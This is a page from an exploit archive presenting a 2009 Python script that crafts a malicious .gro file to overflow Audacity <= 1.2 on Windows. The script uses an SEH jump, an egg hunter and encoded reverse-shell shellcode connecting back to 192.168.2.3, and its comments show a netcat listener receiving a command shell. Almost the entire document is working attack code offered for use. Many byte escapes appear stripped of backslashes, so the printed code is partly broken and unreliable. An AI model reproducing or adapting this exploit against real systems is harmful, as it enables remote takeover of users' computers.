Audacity <= 1.2 (.gro File) Universal BOF Exploit (egg hunter)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Audacity <= 1.2 (.gro File) Universal BOF Exploit (egg hunter)
# Published : 2009-08-24
# Author : mr_me
# Previous Title : Fat Player 0.6b (.wav File) Universal Local Buffer Exploit
# Next Title : Xenorate Media Player 2.6.0.0 (.xpl) Universal Local Buffer Exploit (SEH)

#!/usr/bin/env python
#
# Audacity <= 1.2 .gro universal buffer overflow exploit
# Author: mr_me
# Download: http://audacity.sourceforge.net/download/
# Tested on Wind0ws XP sp3 & Vist@
#
# Greetz fly to Muts and the offensive-security team
# also to my wonderful partner Vanessa F for putting up with me :P
# http://www.offensive-security.com/information-security-training.php
#
# Original: www.milw0rm.com/exploits/7634
#################################################
#
# samurai@mrme:~$ nc -lvp 4444
# listening on [any] 4444 ...
# 192.168.2.3: inverse host lookup failed: Unknown server error :
# Connection timed out
# connect to [192.168.2.3] from (UNKNOWN) [192.168.2.3] 55164
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesAudacity>

print " [+] Creating eviL .gro file..."

buff = ("x44" * 174)
buff += ("xEBx08x90x90")
buff += ("x22x23x17x01")
buff += "x90"* 4
buff += ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
    "x57x30x30x54" # this is the egg...
    "x8BxFAxAFx75xEAxAFx75xE7xFFxE7")
buff += ("xCC" * 1000);
buff += "W00TW00T"

# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)

buff += ("x89xe5xd9xc3xd9x75xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4bx58x4bx49x4bx4fx4b"
"x4fx4bx4fx45x30x4cx4bx42x4cx46x44x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx45x55x44x38x45x51x4a"
"x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51"
"x4ax4bx50x49x4cx4bx50x34x4cx4bx43x31x4ax4ex50"
"x31x49x50x4dx49x4ex4cx4dx54x49x50x44x34x44x47"
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4bx44x47"
"x4bx50x54x47x54x46x48x44x35x4bx55x4cx4bx51x4f"
"x51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx45x53x46x4cx4cx4b"
"x4dx59x42x4cx51x34x45x4cx45x31x49x53x46x51x49"
"x4bx45x34x4cx4bx47x33x50x30x4cx4bx51x50x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x45x58x51"
"x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x4ex36x43x56x50x53x45x36x42x48x46x53x50x32x45"
"x38x43x47x44x33x46x52x51x4fx51x44x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx4e"
"x36x51x4fx4cx49x4ax45x45x36x4bx31x4ax4dx44x48"
"x45x52x46x35x42x4ax44x42x4bx4fx48x50x45x38x4e"
"x39x45x59x4cx35x4ex4dx51x47x4bx4fx49x46x46x33"
"x51x43x51x43x51x43x50x43x51x43x47x33x51x43x4b"
"x4fx4ex30x42x48x49x50x49x38x45x52x45x53x42x46"
"x42x48x44x51x51x4cx43x56x50x53x4bx39x4dx31x4d"
"x45x43x58x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f"
"x4ex36x42x4ax42x30x46x31x46x35x4bx4fx48x50x42"
"x46x43x5ax42x44x43x56x42x48x45x33x42x4dx42x4a"
"x46x30x50x59x46x49x48x4cx4bx39x4ax47x43x5ax47"
"x34x4dx59x4bx52x50x31x49x50x4ax53x4ex4ax4ax35"
"x4dx59x4bx4dx4bx4ex50x42x46x4dx4bx4ex50x42x46"
"x4cx4cx4dx42x5ax47x48x4ex4bx4ex4bx4ex4bx45x38"
"x42x52x4bx4ex48x33x42x36x4bx4fx42x55x47x58x4b"
"x4fx49x46x51x4bx51x47x51x42x46x31x50x51x46x31"
"x42x4ax43x31x50x51x50x51x51x45x50x51x4bx4fx4e"
"x30x42x48x4ex4dx4ex39x43x35x48x4ex51x43x4bx4f"
"x48x56x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x42"
"x48x4dx37x43x49x48x46x43x49x4bx4fx42x55x44x44"
"x4bx4fx49x46x4bx4fx43x47x4bx4cx4bx4fx4ex30x43"
"x58x4ax50x4cx4ax45x54x51x4fx50x53x4bx4fx4ex36"
"x4bx4fx48x50x44x4ax41x41")

file = open('mr_mes_eviL.gro','w');
file.write(buff);
file.close();

print " [+] mr_mes_eviL.gro File created successfully. :)"

# www.Syue.com [2009-08-24]